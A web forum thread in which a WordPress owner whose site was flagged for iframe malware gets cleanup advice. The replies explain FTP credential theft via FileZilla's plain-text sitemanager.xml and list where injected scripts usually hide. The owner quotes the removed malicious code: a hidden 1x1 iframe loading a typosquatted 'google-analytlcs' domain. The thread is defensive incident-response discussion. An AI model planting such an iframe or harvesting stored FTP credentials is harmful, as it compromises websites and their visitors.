I just got a notification from Google that my site is infected with malicious software and it shall be tagged with a hrmful message on google.com search.
I looked into my site, and avast antivirus also showed me a virus alert of "
HTML:Iframe-inf " malware. I tried changing the wordpress theme of the site but that is not helping.
Can anyone please let me know how to go about it ?
Quite often we find that websites have been infected by stolen FTP login credentials (username and password).
These credentials are stolen by a virus on a PC that has FTP access to the infected website.
The virus in many ways.
First, if you're using a PC with one of the free FTP programs like FileZilla, then you should know that many of those programs store the saved login credentials in a plain text file on the PC.
If you're on Windows XP and using the latest FileZilla, look in:
C:\Document and Settings\(user)\Application Data\FileZilla\sitemanager.xml, where (user) is the currently logged in user to the PC. This is usually administrator.
The PC gets infected by a virus, probably from the user visiting an infected website, and the virus looks for these files, reads them and sends the contents to a serverwhich then uses valid login and password to infect the website.
The hackers will usually put backdoors on the website as well so they can re-infect the website after the owner has changed the FTP password (step #1 by the way).
These backdoors can be .php, perl or other files.
The second way the virus works is by sniffing the outgoing FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to "see" and steal the login credentials this way as well.
I have a youtube video that shows how easy it is to sniff FTP traffic:
The only way to avoid that method is to see if your hosting provider supports SFTP or FTPS. Those protocols are encrypted so it's more difficult to sniff.
So, first change all FTP passwords. I recommend creating a different FTP account for each user, that includes developers, webmasters, etc.
Then make sure that FTP logging is activated. Many hosting providers have this off by default.
With these two steps, if your site does get infected again, you can look in the logs and see who's FTP account was used to infect the website. That's the person with the virus.
Now, where to find the infectious code (malscripts).
We generally find it in these locations:
- Before the opening html tag (<html>)
- Sometimes right after the opening html tag
- Immediately after the closing head tag
- Between the closing head tag and the opening body tag
- Immediately after the opening body tag (you may have to scroll to the right to see it)
- Right before the closing body tag
- Between the closing body tag and the closing html tag
- After the closing html tag. (again, you may have to scroll to see it)
In .js files it's usually in the last lines of the file so it doesn't negatively affect the good code.
Clean the files or if you have a known, good backup, just restore your site. However, that won't get rid of the backdoors. Those are too many to list and there are a multitude of variations as well. If you have a file that you suspect, if you provide it to me, I will inspect it and let you know.
I hope this helps. This is my experience from cleaning over 20,000 websites during the past 3 years.
Well, it's certainly best practice to have the version up to date. Kudos for that.
It could be the theme, but I suspect it's more likely to be a plugin vulnerability.
Do you have lots of them, can you list them here?
The counters.dat error is legitimate as I had removed the counter script but left the code in the php file.
I searched for Database and one of my post had a iframe which i removed. I have asked the sys admin to do a search of all the files .
The iframe on the post was
<iframe src="http://google-analytlcs.com/l/index.php" width=
"1" height="1" frameborder="0"> </iframe>
Note that the google-analytlcs is a fake with with "i" replaced with "l".
But I still don't know the security hole, I have the latest wordpress version, all of the files or folders have write permission only for server and user.
I notice one of the results shows
Warning: fopen(counterst.dat) [function.fopen]: failed to open stream: Permission denied in /home/sr/public_html/siterank.php on line 444 ...
Have you gone to http://www.google.com/support/webmasters/bin/answer.py?answer=163633 ??